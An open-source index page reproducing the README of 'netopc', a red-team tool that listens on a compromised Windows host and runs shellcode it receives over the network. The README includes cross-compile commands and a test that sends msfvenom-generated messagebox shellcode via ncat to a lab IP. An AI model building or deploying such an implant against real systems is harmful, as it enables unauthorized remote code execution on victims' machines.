Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/totekuh/netopc

netopc is a tool that executes shellcode on compromised systems by listening for network connections and running received shellcode in a separate process.
https://github.com/totekuh/netopc

Last synced: 1 day ago
JSON representation

netopc is a tool that executes shellcode on compromised systems by listening for network connections and running received shellcode in a separate process.

Awesome Lists containing this project

README

        

## Overview

`netopc` is a tool designed for red team operations to enable remote execution of shellcode on compromised systems.

It functions by listening for network connections, receiving raw machine code (shellcode), and executing the received code in a separate process.

## Prerequisites

- Linux environment
- MinGW-w64 toolchain installed for cross-compiling to Windows targets
- Standard development tools (make, gcc)

## Usage

Clean the project files:

```bash
make clean
```

### Compiling for x86

Use the following command to compile the project for x86 architecture:

```bash
make CC=i686-w64-mingw32-gcc
```

### Compiling for x64

For compiling the project to support x64 architecture, use the x64 specific MinGW-w64 compiler:

```bash
make CC=x86_64-w64-mingw32-gcc
```

Execute the compiled binary on a Windows machine or in a test environment:

```bash
./netopc.exe
```

### Testing

Use this command to start up `netopc`:

```powershell
PS C:\Users\User> .\netopc.exe
```

Use the following commands to generate shellcode that pops up a message box and then execute it remotely on the compromised system where `netopc` is running:

```bash
msfvenom -p windows/messagebox -f raw > shellcode.bin
cat shellcode.bin |ncat 192.168.56.104 42000
```

![netopc](./.img/msfvenom.png)